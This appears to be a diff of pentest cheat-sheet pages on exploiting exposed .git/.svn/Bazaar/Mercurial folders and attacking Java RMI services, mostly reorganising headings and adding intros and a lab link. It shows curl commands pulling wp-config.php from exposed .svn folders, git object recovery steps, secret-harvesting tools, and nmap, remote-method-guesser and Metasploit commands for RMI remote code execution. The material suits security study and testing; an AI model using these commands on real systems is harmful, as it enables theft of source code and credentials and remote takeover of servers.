* `$token = md5(time()+123456789 % rand(4000, 55000000));` * `$token = md5(time()+123456789 % rand(4000, 55000000));`
### Tools
Generic identification and sandwitch attack: Generic identification and sandwitch attack:
* [AethliosIK/reset-tolkien](https://github.com/AethliosIK/reset-tolkien) - Insecure time-based secret exploitation and Sandwich attack implementation Resources * [AethliosIK/reset-tolkien](https://github.com/AethliosIK/reset-tolkien) - Insecure time-based secret exploitation and Sandwich attack implementation Resources

View file

@ -1,5 +1,8 @@
# Bazaar # Bazaar
> Bazaar (also known as bzr ) is a free, distributed version control system (DVCS) that helps you track project history over time and collaborate seamlessly with others. Developed by Canonical, Bazaar emphasizes ease of use, a flexible workflow, and rich features to cater to both individual developers and large teams.
## Summary ## Summary
* [Tools](#tools) * [Tools](#tools)

View file

@ -2,7 +2,7 @@
## Summary ## Summary
* [Example](#example) * [Methodology](#methodology)
* [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead) * [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead)
* [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex) * [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex)
* [Tools](#tools) * [Tools](#tools)
@ -21,7 +21,7 @@
* [Refererences] * [Refererences]
## Example ## Methodology
The following examples will create either a copy of the .git or a copy of the current commit. The following examples will create either a copy of the .git or a copy of the current commit.
@ -31,6 +31,7 @@ Check for the following files, if they exist you can extract the .git folder.
- .git/HEAD - .git/HEAD
- .git/logs/HEAD - .git/logs/HEAD
### Recovering file contents from .git/logs/HEAD ### Recovering file contents from .git/logs/HEAD
1. Check for 403 Forbidden or directory listing to find the `/.git/` directory 1. Check for 403 Forbidden or directory listing to find the `/.git/` directory
@ -83,6 +84,7 @@ Check for the following files, if they exist you can extract the .git folder.
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
``` ```
### Recovering file contents from .git/index ### Recovering file contents from .git/index
Use the git index file parser https://pypi.python.org/pypi/gin (python3). Use the git index file parser https://pypi.python.org/pypi/gin (python3).
@ -103,6 +105,7 @@ name = CRLF injection/README.md
sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141 sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
``` ```
## Tools ## Tools
### Automatic recovery ### Automatic recovery
@ -166,6 +169,7 @@ git clone https://github.com/internetwache/GitTools
git checkout -- . git checkout -- .
``` ```
### Harvesting secrets ### Harvesting secrets
#### trufflehog #### trufflehog

View file

@ -1,5 +1,8 @@
# Mercurial # Mercurial
> Mercurial (also known as hg from the chemical symbol for mercury) is a distributed version control system (DVCS) designed for efficiency and scalability. Developed by Matt Mackall and first released in 2005, Mercurial is known for its speed, simplicity, and ability to handle large codebases.
## Summary ## Summary
* [Tools](#tools) * [Tools](#tools)

View file

@ -1,15 +1,17 @@
# Insecure Source Code Management # Insecure Source Code Management
Insecure Source Code Management (SCM) can lead to several critical vulnerabilities in web applications and services. Developers often rely on SCM systems like Git and Subversion (SVN) to manage their source code versions. However, poor security practices, such as leaving .git and .svn folders in production environments exposed to the internet, can pose significant risks. > Insecure Source Code Management (SCM) can lead to several critical vulnerabilities in web applications and services. Developers often rely on SCM systems like Git and Subversion (SVN) to manage their source code versions. However, poor security practices, such as leaving .git and .svn folders in production environments exposed to the internet, can pose significant risks.
## Summary ## Summary
* [Methodology](#methodology)
* [Bazaar](./Bazaar.md) * [Bazaar](./Bazaar.md)
* [Git](./Git.md) * [Git](./Git.md)
* [Mercurial](./Mercurial.md) * [Mercurial](./Mercurial.md)
* [Subversion](./Subversion.md) * [Subversion](./Subversion.md)
* [Methodology](#methodology) * [Labs](#labs)
* [References](#references)
## Methodology ## Methodology
@ -26,6 +28,7 @@ The first step is to gather information about the target application. This can b
* **Manual Inspection** : Check URLs manually by navigating to common SCM paths. * **Manual Inspection** : Check URLs manually by navigating to common SCM paths.
* http://target.com/.git/ * http://target.com/.git/
* http://target.com/.svn/ * http://target.com/.svn/
* **Automated Tools** : Refer to the page related to the specific technology. * **Automated Tools** : Refer to the page related to the specific technology.
Once a potential SCM folder is identified, check the HTTP response codes and contents. You might need to bypass `.htaccess` or Reverse Proxy rules. Once a potential SCM folder is identified, check the HTTP response codes and contents. You might need to bypass `.htaccess` or Reverse Proxy rules.
@ -40,6 +43,10 @@ location /.git {
For example in Git, the exploitation technique doesn't require to list the content of the `.git` folder (http://target.com/.git/), the data extraction can still be conducted when files can be read. For example in Git, the exploitation technique doesn't require to list the content of the `.git` folder (http://target.com/.git/), the data extraction can still be conducted when files can be read.
## Labs
* [Root Me - Insecure Code Management](https://www.root-me.org/fr/Challenges/Web-Serveur/Insecure-Code-Management)
## References ## References

View file

@ -1,14 +1,27 @@
# Subversion # Subversion
> Subversion (often abbreviated as SVN) is a centralized version control system (VCS) that has been widely used in the software development industry. Originally developed by CollabNet Inc. in 2000, Subversion was designed to be an improved version of CVS (Concurrent Versions System) and has since gained significant traction for its robustness and reliability.
## Summary ## Summary
* [Examples](#examples)
* [Tools](#tools) * [Tools](#tools)
* [svn-extractor](#svn-extractor) * [svn-extractor](#svn-extractor)
* [Methodology](#methodology)
* [References](#references) * [References](#references)
## Examples ## Tools
### svn-extractor
* [anantshri/svn-extractor](https://github.com/anantshri/svn-extractor) - Simple script to extract all web resources by means of .SVN folder exposed over network.
```powershell
python svn-extractor.py --url "url with .svn available"
```
## Methodology
```powershell ```powershell
curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
@ -25,15 +38,6 @@ curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base` * create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
## Tools
### svn-extractor
* [anantshri/svn-extractor](https://github.com/anantshri/svn-extractor) - Simple script to extract all web resources by means of .SVN folder exposed over network.
```powershell
python svn-extractor.py --url "url with .svn available"
```
## References ## References

View file

@ -2,16 +2,18 @@
> Java RMI (Remote Method Invocation) is a Java API that allows an object running in one JVM (Java Virtual Machine) to invoke methods on an object running in another JVM, even if they're on different physical machines. RMI provides a mechanism for Java-based distributed computing. > Java RMI (Remote Method Invocation) is a Java API that allows an object running in one JVM (Java Virtual Machine) to invoke methods on an object running in another JVM, even if they're on different physical machines. RMI provides a mechanism for Java-based distributed computing.
## Summary ## Summary
* [Tools](#tools) * [Tools](#tools)
* [Detection](#detection) * [Detection](#detection)
* [Exploitation](#exploitation) * [Methodology](#methodology)
* [RCE using beanshooter](#rce-using-beanshooter) * [RCE using beanshooter](#rce-using-beanshooter)
* [RCE using sjet/mjet](#rce-using-sjet-or-mjet) * [RCE using sjet/mjet](#rce-using-sjet-or-mjet)
* [RCE using Metasploit](#rce-using-metasploit) * [RCE using Metasploit](#rce-using-metasploit)
* [References](#references) * [References](#references)
## Tools ## Tools
- [siberas/sjet](https://github.com/siberas/sjet) - [siberas/sjet](https://github.com/siberas/sjet)
@ -19,6 +21,7 @@
- [qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) - [qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
- [qtc-de/beanshooter](https://github.com/qtc-de/beanshooter) - JMX enumeration and attacking tool. - [qtc-de/beanshooter](https://github.com/qtc-de/beanshooter) - JMX enumeration and attacking tool.
## Detection ## Detection
* Using [nmap](https://nmap.org/): * Using [nmap](https://nmap.org/):
@ -35,7 +38,7 @@
| javax.management.remote.rmi.RMIServerImpl_Stub | javax.management.remote.rmi.RMIServerImpl_Stub
``` ```
* Using [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser): * Using [qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser):
```bash ```bash
$ rmg scan 172.17.0.2 --ports 0-65535 $ rmg scan 172.17.0.2 --ports 0-65535
[+] Scanning 6225 Ports on 172.17.0.2 for RMI services. [+] Scanning 6225 Ports on 172.17.0.2 for RMI services.
@ -60,7 +63,7 @@
[...] [...]
``` ```
* Using Metasploit * Using [rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework)
```bash ```bash
use auxiliary/scanner/misc/java_rmi_server use auxiliary/scanner/misc/java_rmi_server
set RHOSTS <IPs> set RHOSTS <IPs>
@ -68,7 +71,7 @@
run run
``` ```
## Exploitation ## Methodology
If a Java Remote Method Invocation (RMI) service is poorly configured, it becomes vulnerable to various Remote Code Execution (RCE) methods. One method involves hosting an MLet file and directing the JMX service to load MBeans from a distant server, achievable using tools like mjet or sjet. The remote-method-guesser tool is newer and combines RMI service enumeration with an overview of recognized attack strategies. If a Java Remote Method Invocation (RMI) service is poorly configured, it becomes vulnerable to various Remote Code Execution (RCE) methods. One method involves hosting an MLet file and directing the JMX service to load MBeans from a distant server, achievable using tools like mjet or sjet. The remote-method-guesser tool is newer and combines RMI service enumeration with an overview of recognized attack strategies.
@ -134,6 +137,7 @@ set RPORT <PORT>
run run
``` ```
## References ## References
- [Attacking RMI based JMX services - Hans-Martin Münch - April 28, 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/) - [Attacking RMI based JMX services - Hans-Martin Münch - April 28, 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/)